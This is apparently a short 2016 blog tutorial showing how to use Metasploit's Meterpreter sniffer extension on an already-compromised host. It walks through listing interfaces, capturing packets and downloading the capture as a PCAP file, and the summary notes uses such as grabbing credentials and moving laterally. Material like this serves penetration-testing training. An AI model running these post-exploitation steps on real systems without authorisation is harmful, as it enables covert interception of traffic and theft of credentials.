Monday, January 18, 2016

Packet Sniffing Metasploit with Meterpreter

Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:

Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:

###user sniffer extension

meterpreter > use sniffer

Loading extension sniffer...success.

meterpreter > ?


....

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface


### We try to see what interface we will to use to sniff the traffic


meterpreter > sniffer_interfaces


1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )


###You can see the interface 2 is the network one, we will start using that interface:

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)


### Stop the sniffer

meterpreter > sniffer_stop 2

[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'


### Download the data

meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap


The I was able to open the file using wireshark raul.pcap

Summary

Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.





No comments:

Post a Comment